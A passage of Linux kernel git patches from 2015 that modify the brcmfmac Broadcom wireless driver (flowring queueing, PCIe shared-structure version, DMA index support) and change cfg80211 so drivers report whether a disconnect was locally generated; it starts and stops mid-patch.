Reviewed-by: Arend Van Spriel Reviewed-by: Franky (Zhenhui) Lin Reviewed-by: Pieter-Paul Giesberts Reviewed-by: Daniel (Deognyoun) Kim Signed-off-by: Hante Meuleman Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/flowring.c | 5 +++-- drivers/net/wireless/brcm80211/brcmfmac/flowring.h | 4 ++-- drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c | 9 ++++++--- 3 files changed, 11 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/flowring.c b/drivers/net/wireless/brcm80211/brcmfmac/flowring.c index eb1325371d3a..59440631fec5 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/flowring.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/flowring.c @@ -249,8 +249,8 @@ void brcmf_flowring_delete(struct brcmf_flowring *flow, u8 flowid) } -void brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, - struct sk_buff *skb) +u32 brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, + struct sk_buff *skb) { struct brcmf_flowring_ring *ring; @@ -271,6 +271,7 @@ void brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, if (skb_queue_len(&ring->skblist) < BRCMF_FLOWRING_LOW) brcmf_flowring_block(flow, flowid, false); } + return skb_queue_len(&ring->skblist); } diff --git a/drivers/net/wireless/brcm80211/brcmfmac/flowring.h b/drivers/net/wireless/brcm80211/brcmfmac/flowring.h index a34cd394c616..5551861a44bc 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/flowring.h +++ b/drivers/net/wireless/brcm80211/brcmfmac/flowring.h @@ -64,8 +64,8 @@ u32 brcmf_flowring_create(struct brcmf_flowring *flow, u8 da[ETH_ALEN], void brcmf_flowring_delete(struct brcmf_flowring *flow, u8 flowid); void brcmf_flowring_open(struct brcmf_flowring *flow, u8 flowid); u8 brcmf_flowring_tid(struct brcmf_flowring *flow, u8 flowid); -void brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, - struct sk_buff *skb); +u32 brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, + struct sk_buff *skb); struct sk_buff *brcmf_flowring_dequeue(struct brcmf_flowring *flow, u8 flowid); void brcmf_flowring_reinsert(struct brcmf_flowring *flow, u8 flowid, struct sk_buff *skb); diff --git a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c index 4ec9811f49c8..b182f53e1c20 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c @@ -73,7 +73,7 @@ #define BRCMF_MSGBUF_TX_FLUSH_CNT1 32 #define BRCMF_MSGBUF_TX_FLUSH_CNT2 96 -#define BRCMF_MSGBUF_DELAY_TXWORKER_THRS 64 +#define BRCMF_MSGBUF_DELAY_TXWORKER_THRS 96 #define BRCMF_MSGBUF_TRICKLE_TXWORKER_THRS 32 struct msgbuf_common_hdr { @@ -797,6 +797,8 @@ static int brcmf_msgbuf_txdata(struct brcmf_pub *drvr, int ifidx, struct brcmf_flowring *flow = msgbuf->flow; struct ethhdr *eh = (struct ethhdr *)(skb->data); u32 flowid; + u32 queue_count; + bool force; flowid = brcmf_flowring_lookup(flow, eh->h_dest, skb->priority, ifidx); if (flowid == BRCMF_FLOWRING_INVALID_ID) { @@ -804,8 +806,9 @@ static int brcmf_msgbuf_txdata(struct brcmf_pub *drvr, int ifidx, if (flowid == BRCMF_FLOWRING_INVALID_ID) return -ENOMEM; } - brcmf_flowring_enqueue(flow, flowid, skb); - brcmf_msgbuf_schedule_txdata(msgbuf, flowid, false); + queue_count = brcmf_flowring_enqueue(flow, flowid, skb); + force = ((queue_count % BRCMF_MSGBUF_TRICKLE_TXWORKER_THRS) == 0); + brcmf_msgbuf_schedule_txdata(msgbuf, flowid, force); return 0; } From fd5e8cb8178ac8cb549c207500006538624537d7 Mon Sep 17 00:00:00 
2001 From: Franky Lin Date: Wed, 20 May 2015 14:09:49 +0200 Subject: [PATCH 222/872] brcmfmac: remove pci shared structure rev4 support All pcie full dongle chips supported by fmac are using rev 5+ shared structure. This patch removes the rev4 related code. Reviewed-by: Pieter-Paul Giesberts Reviewed-by: Hante Meuleman Reviewed-by: Arend Van Spriel Signed-off-by: Franky Lin Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/pcie.c | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c index 79ca24e6d2c5..6ca3037f67d3 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c @@ -112,10 +112,9 @@ enum brcmf_pcie_state { BRCMF_PCIE_MB_INT_D2H3_DB0 | \ BRCMF_PCIE_MB_INT_D2H3_DB1) -#define BRCMF_PCIE_MIN_SHARED_VERSION 4 +#define BRCMF_PCIE_MIN_SHARED_VERSION 5 #define BRCMF_PCIE_MAX_SHARED_VERSION 5 #define BRCMF_PCIE_SHARED_VERSION_MASK 0x00FF -#define BRCMF_PCIE_SHARED_TXPUSH_SUPPORT 0x4000 #define BRCMF_PCIE_FLAGS_HTOD_SPLIT 0x4000 #define BRCMF_PCIE_FLAGS_DTOH_SPLIT 0x8000 @@ -1280,11 +1279,6 @@ brcmf_pcie_init_share_ram_info(struct brcmf_pciedev_info *devinfo, brcmf_err("Unsupported PCIE version %d\n", version); return -EINVAL; } - if (shared->flags & BRCMF_PCIE_SHARED_TXPUSH_SUPPORT) { - brcmf_err("Unsupported legacy TX mode 0x%x\n", - shared->flags & BRCMF_PCIE_SHARED_TXPUSH_SUPPORT); - return -EINVAL; - } addr = sharedram_addr + BRCMF_SHARED_MAX_RXBUFPOST_OFFSET; shared->max_rxbufpost = brcmf_pcie_read_tcm16(devinfo, addr); From c2d4182edc0525dc912e166f4fc04cb58c5d5184 Mon Sep 17 00:00:00 2001 From: Franky Lin Date: Wed, 20 May 2015 14:09:50 +0200 Subject: [PATCH 223/872] brcmfmac: remove dummy cache flush/invalidate function brcmf_dma_flush and brcmf_dma_invalidate_cache are not necessary and have never been implemented. Reviewed-by: Pieter-Paul Giesberts Reviewed-by: Hante Meuleman Reviewed-by: Arend Van Spriel Signed-off-by: Franky Lin Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- .../wireless/brcm80211/brcmfmac/commonring.c | 18 ------------------ .../net/wireless/brcm80211/brcmfmac/msgbuf.c | 11 ----------- drivers/net/wireless/brcm80211/brcmfmac/pcie.c | 11 ----------- 3 files changed, 40 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/commonring.c b/drivers/net/wireless/brcm80211/brcmfmac/commonring.c index 77656c711bed..26c65872dae3 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/commonring.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/commonring.c @@ -22,17 +22,6 @@ #include "core.h" #include "commonring.h" - -/* dma flushing needs implementation for mips and arm platforms. Should - * be put in util. Note, this is not real flushing. It is virtual non - * cached memory. Only write buffers should have to be drained. Though - * this may be different depending on platform...... 
- * SEE ALSO msgbuf.c - */ -#define brcmf_dma_flush(addr, len) -#define brcmf_dma_invalidate_cache(addr, len) - - void brcmf_commonring_register_cb(struct brcmf_commonring *commonring, int (*cr_ring_bell)(void *ctx), int (*cr_update_rptr)(void *ctx), @@ -206,14 +195,9 @@ int brcmf_commonring_write_complete(struct brcmf_commonring *commonring) address = commonring->buf_addr; address += (commonring->f_ptr * commonring->item_len); if (commonring->f_ptr > commonring->w_ptr) { - brcmf_dma_flush(address, - (commonring->depth - commonring->f_ptr) * - commonring->item_len); address = commonring->buf_addr; commonring->f_ptr = 0; } - brcmf_dma_flush(address, (commonring->w_ptr - commonring->f_ptr) * - commonring->item_len); commonring->f_ptr = commonring->w_ptr; @@ -258,8 +242,6 @@ void *brcmf_commonring_get_read_ptr(struct brcmf_commonring *commonring, if (commonring->r_ptr == commonring->depth) commonring->r_ptr = 0; - brcmf_dma_invalidate_cache(ret_addr, *n_items * commonring->item_len); - return ret_addr; } diff --git a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c index b182f53e1c20..a932e45fc0ee 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c @@ -278,16 +278,6 @@ struct brcmf_msgbuf_pktids { struct brcmf_msgbuf_pktid *array; }; - -/* dma flushing needs implementation for mips and arm platforms. Should - * be put in util. Note, this is not real flushing. It is virtual non - * cached memory. Only write buffers should have to be drained. Though - * this may be different depending on platform...... - */ -#define brcmf_dma_flush(addr, len) -#define brcmf_dma_invalidate_cache(addr, len) - - static void brcmf_msgbuf_rxbuf_ioctlresp_post(struct brcmf_msgbuf *msgbuf); @@ -462,7 +452,6 @@ static int brcmf_msgbuf_tx_ioctl(struct brcmf_pub *drvr, int ifidx, memcpy(msgbuf->ioctbuf, buf, buf_len); else memset(msgbuf->ioctbuf, 0, buf_len); - brcmf_dma_flush(ioctl_buf, buf_len); err = brcmf_commonring_write_complete(commonring); brcmf_commonring_unlock(commonring); diff --git a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c index 6ca3037f67d3..2bc24a4e566b 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c @@ -276,15 +276,6 @@ static const u32 brcmf_ring_itemsize[BRCMF_NROF_COMMON_MSGRINGS] = { }; -/* dma flushing needs implementation for mips and arm platforms. Should - * be put in util. Note, this is not real flushing. It is virtual non - * cached memory. Only write buffers should have to be drained. Though - * this may be different depending on platform...... 
- */ -#define brcmf_dma_flush(addr, len) -#define brcmf_dma_invalidate_cache(addr, len) - - static u32 brcmf_pcie_read_reg32(struct brcmf_pciedev_info *devinfo, u32 reg_offset) { @@ -1174,7 +1165,6 @@ static int brcmf_pcie_init_scratchbuffers(struct brcmf_pciedev_info *devinfo) goto fail; memset(devinfo->shared.scratch, 0, BRCMF_DMA_D2H_SCRATCH_BUF_LEN); - brcmf_dma_flush(devinfo->shared.scratch, BRCMF_DMA_D2H_SCRATCH_BUF_LEN); addr = devinfo->shared.tcm_base_address + BRCMF_SHARED_DMA_SCRATCH_ADDR_OFFSET; @@ -1192,7 +1182,6 @@ static int brcmf_pcie_init_scratchbuffers(struct brcmf_pciedev_info *devinfo) goto fail; memset(devinfo->shared.ringupd, 0, BRCMF_DMA_D2H_RINGUPD_BUF_LEN); - brcmf_dma_flush(devinfo->shared.ringupd, BRCMF_DMA_D2H_RINGUPD_BUF_LEN); addr = devinfo->shared.tcm_base_address + BRCMF_SHARED_DMA_RINGUPD_ADDR_OFFSET; From f3550aeb7fcd893a52ebf89a064fc95be57f29d1 Mon Sep 17 00:00:00 2001 From: Franky Lin Date: Wed, 20 May 2015 14:09:51 +0200 Subject: [PATCH 224/872] brcmfmac: add support for dma indices feature PCIe full dongle firmware can support a dma indices feature with which firmware can update/fetch the read/write indices of message buffer rings on both host to dongle and dongle to host directions. The support is announced by firmware through shared flags. Reviewed-by: Arend Van Spriel Reviewed-by: Pieter-Paul Giesberts Signed-off-by: Franky Lin Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/pcie.c | 140 +++++++++++++++--- 1 file changed, 119 insertions(+), 21 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c index 2bc24a4e566b..37a2624d7bba 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c @@ -115,6 +115,8 @@ enum brcmf_pcie_state { #define BRCMF_PCIE_MIN_SHARED_VERSION 5 #define BRCMF_PCIE_MAX_SHARED_VERSION 5 #define BRCMF_PCIE_SHARED_VERSION_MASK 0x00FF +#define BRCMF_PCIE_SHARED_DMA_INDEX 0x10000 +#define BRCMF_PCIE_SHARED_DMA_2B_IDX 0x100000 #define BRCMF_PCIE_FLAGS_HTOD_SPLIT 0x4000 #define BRCMF_PCIE_FLAGS_DTOH_SPLIT 0x8000 @@ -146,6 +148,10 @@ enum brcmf_pcie_state { #define BRCMF_SHARED_RING_H2D_R_IDX_PTR_OFFSET 8 #define BRCMF_SHARED_RING_D2H_W_IDX_PTR_OFFSET 12 #define BRCMF_SHARED_RING_D2H_R_IDX_PTR_OFFSET 16 +#define BRCMF_SHARED_RING_H2D_WP_HADDR_OFFSET 20 +#define BRCMF_SHARED_RING_H2D_RP_HADDR_OFFSET 28 +#define BRCMF_SHARED_RING_D2H_WP_HADDR_OFFSET 36 +#define BRCMF_SHARED_RING_D2H_RP_HADDR_OFFSET 44 #define BRCMF_SHARED_RING_TCM_MEMLOC_OFFSET 0 #define BRCMF_SHARED_RING_MAX_SUB_QUEUES 52 @@ -247,6 +253,13 @@ struct brcmf_pciedev_info { bool mbdata_completed; bool irq_allocated; bool wowl_enabled; + u8 dma_idx_sz; + void *idxbuf; + u32 idxbuf_sz; + dma_addr_t idxbuf_dmahandle; + u16 (*read_ptr)(struct brcmf_pciedev_info *devinfo, u32 mem_offset); + void (*write_ptr)(struct brcmf_pciedev_info *devinfo, u32 mem_offset, + u16 value); }; struct brcmf_pcie_ringbuf { @@ -323,6 +336,25 @@ brcmf_pcie_write_tcm16(struct brcmf_pciedev_info *devinfo, u32 mem_offset, } +static u16 +brcmf_pcie_read_idx(struct brcmf_pciedev_info *devinfo, u32 mem_offset) +{ + u16 *address = devinfo->idxbuf + mem_offset; + + return (*(address)); +} + + +static void +brcmf_pcie_write_idx(struct brcmf_pciedev_info *devinfo, u32 mem_offset, + u16 value) +{ + u16 *address = devinfo->idxbuf + mem_offset; + + *(address) = value; +} + + static u32 brcmf_pcie_read_tcm32(struct brcmf_pciedev_info *devinfo, 
u32 mem_offset) { @@ -868,7 +900,7 @@ static int brcmf_pcie_ring_mb_write_rptr(void *ctx) brcmf_dbg(PCIE, "W r_ptr %d (%d), ring %d\n", commonring->r_ptr, commonring->w_ptr, ring->id); - brcmf_pcie_write_tcm16(devinfo, ring->r_idx_addr, commonring->r_ptr); + devinfo->write_ptr(devinfo, ring->r_idx_addr, commonring->r_ptr); return 0; } @@ -886,7 +918,7 @@ static int brcmf_pcie_ring_mb_write_wptr(void *ctx) brcmf_dbg(PCIE, "W w_ptr %d (%d), ring %d\n", commonring->w_ptr, commonring->r_ptr, ring->id); - brcmf_pcie_write_tcm16(devinfo, ring->w_idx_addr, commonring->w_ptr); + devinfo->write_ptr(devinfo, ring->w_idx_addr, commonring->w_ptr); return 0; } @@ -915,7 +947,7 @@ static int brcmf_pcie_ring_mb_update_rptr(void *ctx) if (devinfo->state != BRCMFMAC_PCIE_STATE_UP) return -EIO; - commonring->r_ptr = brcmf_pcie_read_tcm16(devinfo, ring->r_idx_addr); + commonring->r_ptr = devinfo->read_ptr(devinfo, ring->r_idx_addr); brcmf_dbg(PCIE, "R r_ptr %d (%d), ring %d\n", commonring->r_ptr, commonring->w_ptr, ring->id); @@ -933,7 +965,7 @@ static int brcmf_pcie_ring_mb_update_wptr(void *ctx) if (devinfo->state != BRCMFMAC_PCIE_STATE_UP) return -EIO; - commonring->w_ptr = brcmf_pcie_read_tcm16(devinfo, ring->w_idx_addr); + commonring->w_ptr = devinfo->read_ptr(devinfo, ring->w_idx_addr); brcmf_dbg(PCIE, "R w_ptr %d (%d), ring %d\n", commonring->w_ptr, commonring->r_ptr, ring->id); @@ -1038,6 +1070,13 @@ static void brcmf_pcie_release_ringbuffers(struct brcmf_pciedev_info *devinfo) } kfree(devinfo->shared.flowrings); devinfo->shared.flowrings = NULL; + if (devinfo->idxbuf) { + dma_free_coherent(&devinfo->pdev->dev, + devinfo->idxbuf_sz, + devinfo->idxbuf, + devinfo->idxbuf_dmahandle); + devinfo->idxbuf = NULL; + } } @@ -1053,19 +1092,72 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) u32 addr; u32 ring_mem_ptr; u32 i; + u64 address; + u32 bufsz; u16 max_sub_queues; + u8 idx_offset; ring_addr = devinfo->shared.ring_info_addr; brcmf_dbg(PCIE, "Base ring addr = 0x%08x\n", ring_addr); + addr = ring_addr + BRCMF_SHARED_RING_MAX_SUB_QUEUES; + max_sub_queues = brcmf_pcie_read_tcm16(devinfo, addr); + + if (devinfo->dma_idx_sz != 0) { + bufsz = (BRCMF_NROF_D2H_COMMON_MSGRINGS + max_sub_queues) * + devinfo->dma_idx_sz * 2; + devinfo->idxbuf = dma_alloc_coherent(&devinfo->pdev->dev, bufsz, + &devinfo->idxbuf_dmahandle, + GFP_KERNEL); + if (!devinfo->idxbuf) + devinfo->dma_idx_sz = 0; + } - addr = ring_addr + BRCMF_SHARED_RING_D2H_W_IDX_PTR_OFFSET; - d2h_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); - addr = ring_addr + BRCMF_SHARED_RING_D2H_R_IDX_PTR_OFFSET; - d2h_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); - addr = ring_addr + BRCMF_SHARED_RING_H2D_W_IDX_PTR_OFFSET; - h2d_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); - addr = ring_addr + BRCMF_SHARED_RING_H2D_R_IDX_PTR_OFFSET; - h2d_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + if (devinfo->dma_idx_sz == 0) { + addr = ring_addr + BRCMF_SHARED_RING_D2H_W_IDX_PTR_OFFSET; + d2h_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + addr = ring_addr + BRCMF_SHARED_RING_D2H_R_IDX_PTR_OFFSET; + d2h_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + addr = ring_addr + BRCMF_SHARED_RING_H2D_W_IDX_PTR_OFFSET; + h2d_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + addr = ring_addr + BRCMF_SHARED_RING_H2D_R_IDX_PTR_OFFSET; + h2d_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + idx_offset = sizeof(u32); + devinfo->write_ptr = brcmf_pcie_write_tcm16; + devinfo->read_ptr = brcmf_pcie_read_tcm16; + brcmf_dbg(PCIE, "Using TCM 
indices\n"); + } else { + memset(devinfo->idxbuf, 0, bufsz); + devinfo->idxbuf_sz = bufsz; + idx_offset = devinfo->dma_idx_sz; + devinfo->write_ptr = brcmf_pcie_write_idx; + devinfo->read_ptr = brcmf_pcie_read_idx; + + h2d_w_idx_ptr = 0; + addr = ring_addr + BRCMF_SHARED_RING_H2D_WP_HADDR_OFFSET; + address = (u64)devinfo->idxbuf_dmahandle; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + + h2d_r_idx_ptr = h2d_w_idx_ptr + max_sub_queues * idx_offset; + addr = ring_addr + BRCMF_SHARED_RING_H2D_RP_HADDR_OFFSET; + address += max_sub_queues * idx_offset; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + + d2h_w_idx_ptr = h2d_r_idx_ptr + max_sub_queues * idx_offset; + addr = ring_addr + BRCMF_SHARED_RING_D2H_WP_HADDR_OFFSET; + address += max_sub_queues * idx_offset; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + + d2h_r_idx_ptr = d2h_w_idx_ptr + + BRCMF_NROF_D2H_COMMON_MSGRINGS * idx_offset; + addr = ring_addr + BRCMF_SHARED_RING_D2H_RP_HADDR_OFFSET; + address += BRCMF_NROF_D2H_COMMON_MSGRINGS * idx_offset; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + brcmf_dbg(PCIE, "Using host memory indices\n"); + } addr = ring_addr + BRCMF_SHARED_RING_TCM_MEMLOC_OFFSET; ring_mem_ptr = brcmf_pcie_read_tcm32(devinfo, addr); @@ -1079,8 +1171,8 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) ring->id = i; devinfo->shared.commonrings[i] = ring; - h2d_w_idx_ptr += sizeof(u32); - h2d_r_idx_ptr += sizeof(u32); + h2d_w_idx_ptr += idx_offset; + h2d_r_idx_ptr += idx_offset; ring_mem_ptr += BRCMF_RING_MEM_SZ; } @@ -1094,13 +1186,11 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) ring->id = i; devinfo->shared.commonrings[i] = ring; - d2h_w_idx_ptr += sizeof(u32); - d2h_r_idx_ptr += sizeof(u32); + d2h_w_idx_ptr += idx_offset; + d2h_r_idx_ptr += idx_offset; ring_mem_ptr += BRCMF_RING_MEM_SZ; } - addr = ring_addr + BRCMF_SHARED_RING_MAX_SUB_QUEUES; - max_sub_queues = brcmf_pcie_read_tcm16(devinfo, addr); devinfo->shared.nrof_flowrings = max_sub_queues - BRCMF_NROF_H2D_COMMON_MSGRINGS; rings = kcalloc(devinfo->shared.nrof_flowrings, sizeof(*ring), @@ -1124,15 +1214,15 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) ring); ring->w_idx_addr = h2d_w_idx_ptr; ring->r_idx_addr = h2d_r_idx_ptr; - h2d_w_idx_ptr += sizeof(u32); - h2d_r_idx_ptr += sizeof(u32); + h2d_w_idx_ptr += idx_offset; + h2d_r_idx_ptr += idx_offset; } devinfo->shared.flowrings = rings; return 0; fail: - brcmf_err("Allocating commonring buffers failed\n"); + brcmf_err("Allocating ring buffers failed\n"); brcmf_pcie_release_ringbuffers(devinfo); return -ENOMEM; } @@ -1269,6 +1359,14 @@ brcmf_pcie_init_share_ram_info(struct brcmf_pciedev_info *devinfo, return -EINVAL; } + /* check firmware support dma indicies */ + if (shared->flags & BRCMF_PCIE_SHARED_DMA_INDEX) { + if (shared->flags & BRCMF_PCIE_SHARED_DMA_2B_IDX) + devinfo->dma_idx_sz = sizeof(u16); + else + devinfo->dma_idx_sz = sizeof(u32); + } + addr = sharedram_addr + BRCMF_SHARED_MAX_RXBUFPOST_OFFSET; shared->max_rxbufpost = brcmf_pcie_read_tcm16(devinfo, addr); if (shared->max_rxbufpost == 0) From 80279fb7ba5b71981a60988b0307afa43f78f6b1 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 22 May 2015 16:22:20 
+0200 Subject: [PATCH 225/872] cfg80211: properly send NL80211_ATTR_DISCONNECTED_BY_AP in disconnect When we disconnect from the AP, drivers call cfg80211_disconnect(). This doesn't know whether the disconnection was initiated locally or by the AP though, which can cause problems with the supplicant, for example with WPS. This issue obviously doesn't show up with any mac80211 based driver since mac80211 doesn't call this function. Fix this by requiring drivers to indicate whether the disconnect is locally generated or not. I've tried to update the drivers, but may not have gotten the values correct, and some drivers may currently not be able to report correct values. In case of doubt I left it at false, which is the current behaviour. For libertas, make adjustments as indicated by Dan Williams. Reported-by: Matthieu Mauger Tested-by: Matthieu Mauger Signed-off-by: Johannes Berg --- drivers/net/wireless/ath/ath6kl/cfg80211.c | 4 ++-- drivers/net/wireless/ath/wil6210/main.c | 2 +- drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c | 4 ++-- drivers/net/wireless/libertas/cfg.c | 13 ++++++------- drivers/net/wireless/libertas/cfg.h | 3 ++- drivers/net/wireless/libertas/cmd.h | 3 ++- drivers/net/wireless/libertas/cmdresp.c | 13 ++++++++----- drivers/net/wireless/mwifiex/join.c | 2 +- drivers/net/wireless/mwifiex/sta_event.c | 2 +- drivers/net/wireless/rndis_wlan.c | 2 +- drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c | 2 +- drivers/staging/wlan-ng/cfg80211.c | 2 +- include/net/cfg80211.h | 4 +++- net/wireless/core.h | 1 + net/wireless/sme.c | 4 +++- net/wireless/util.c | 3 ++- 16 files changed, 37 insertions(+), 27 deletions(-) diff --git a/drivers/net/wireless/ath/ath6kl/cfg80211.c b/drivers/net/wireless/ath/ath6kl/cfg80211.c index cce4625a53ad..a511ef3614b9 100644 --- a/drivers/net/wireless/ath/ath6kl/cfg80211.c +++ b/drivers/net/wireless/ath/ath6kl/cfg80211.c @@ -889,7 +889,7 @@ void ath6kl_cfg80211_disconnect_event(struct ath6kl_vif *vif, u8 reason, GFP_KERNEL); } else if (vif->sme_state == SME_CONNECTED) { cfg80211_disconnected(vif->ndev, proto_reason, - NULL, 0, GFP_KERNEL); + NULL, 0, false, GFP_KERNEL); } vif->sme_state = SME_DISCONNECTED; @@ -3467,7 +3467,7 @@ void ath6kl_cfg80211_stop(struct ath6kl_vif *vif) GFP_KERNEL); break; case SME_CONNECTED: - cfg80211_disconnected(vif->ndev, 0, NULL, 0, GFP_KERNEL); + cfg80211_disconnected(vif->ndev, 0, NULL, 0, true, GFP_KERNEL); break; } diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index c2a238426425..38b953e108a7 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -224,7 +224,7 @@ static void _wil6210_disconnect(struct wil6210_priv *wil, const u8 *bssid, if (test_bit(wil_status_fwconnected, wil->status)) { clear_bit(wil_status_fwconnected, wil->status); cfg80211_disconnected(ndev, reason_code, - NULL, 0, GFP_KERNEL); + NULL, 0, false, GFP_KERNEL); } else if (test_bit(wil_status_fwconnecting, wil->status)) { cfg80211_connect_result(ndev, bssid, NULL, 0, NULL, 0, WLAN_STATUS_UNSPECIFIED_FAILURE, diff --git a/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c index 8a15ebbce4a3..2e4e42245b8f 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c @@ -1262,7 +1262,7 @@ static void brcmf_link_down(struct brcmf_cfg80211_vif *vif, u16 reason) } clear_bit(BRCMF_VIF_STATUS_CONNECTED, &vif->sme_state); 
cfg80211_disconnected(vif->wdev.netdev, reason, NULL, 0, - GFP_KERNEL); + true, GFP_KERNEL); } clear_bit(BRCMF_VIF_STATUS_CONNECTING, &vif->sme_state); @@ -1928,7 +1928,7 @@ brcmf_cfg80211_disconnect(struct wiphy *wiphy, struct net_device *ndev, clear_bit(BRCMF_VIF_STATUS_CONNECTED, &ifp->vif->sme_state); clear_bit(BRCMF_VIF_STATUS_CONNECTING, &ifp->vif->sme_state); - cfg80211_disconnected(ndev, reason_code, NULL, 0, GFP_KERNEL); + cfg80211_disconnected(ndev, reason_code, NULL, 0, true, GFP_KERNEL); memcpy(&scbval.ea, &profile->bssid, ETH_ALEN); scbval.val = cpu_to_le32(reason_code); diff --git a/drivers/net/wireless/libertas/cfg.c b/drivers/net/wireless/libertas/cfg.c index 1a4d558022d8..8317afd065b4 100644 --- a/drivers/net/wireless/libertas/cfg.c +++ b/drivers/net/wireless/libertas/cfg.c @@ -835,14 +835,13 @@ static int lbs_cfg_scan(struct wiphy *wiphy, * Events */ -void lbs_send_disconnect_notification(struct lbs_private *priv) +void lbs_send_disconnect_notification(struct lbs_private *priv, + bool locally_generated) { lbs_deb_enter(LBS_DEB_CFG80211); - cfg80211_disconnected(priv->dev, - 0, - NULL, 0, - GFP_KERNEL); + cfg80211_disconnected(priv->dev, 0, NULL, 0, locally_generated, + GFP_KERNEL); lbs_deb_leave(LBS_DEB_CFG80211); } @@ -1458,7 +1457,7 @@ int lbs_disconnect(struct lbs_private *priv, u16 reason) cfg80211_disconnected(priv->dev, reason, - NULL, 0, + NULL, 0, true, GFP_KERNEL); priv->connect_status = LBS_DISCONNECTED; @@ -2031,7 +2030,7 @@ static int lbs_leave_ibss(struct wiphy *wiphy, struct net_device *dev) ret = lbs_cmd_with_response(priv, CMD_802_11_AD_HOC_STOP, &cmd); /* TODO: consider doing this at MACREG_INT_CODE_ADHOC_BCN_LOST time */ - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, true); lbs_deb_leave_args(LBS_DEB_CFG80211, "ret %d", ret); return ret; diff --git a/drivers/net/wireless/libertas/cfg.h b/drivers/net/wireless/libertas/cfg.h index 10995f59fe34..acccc2922401 100644 --- a/drivers/net/wireless/libertas/cfg.h +++ b/drivers/net/wireless/libertas/cfg.h @@ -10,7 +10,8 @@ struct wireless_dev *lbs_cfg_alloc(struct device *dev); int lbs_cfg_register(struct lbs_private *priv); void lbs_cfg_free(struct lbs_private *priv); -void lbs_send_disconnect_notification(struct lbs_private *priv); +void lbs_send_disconnect_notification(struct lbs_private *priv, + bool locally_generated); void lbs_send_mic_failureevent(struct lbs_private *priv, u32 event); void lbs_scan_done(struct lbs_private *priv); diff --git a/drivers/net/wireless/libertas/cmd.h b/drivers/net/wireless/libertas/cmd.h index 4279e8ab95f2..0c5444b02c64 100644 --- a/drivers/net/wireless/libertas/cmd.h +++ b/drivers/net/wireless/libertas/cmd.h @@ -68,7 +68,8 @@ int lbs_process_command_response(struct lbs_private *priv, u8 *data, u32 len); /* From cmdresp.c 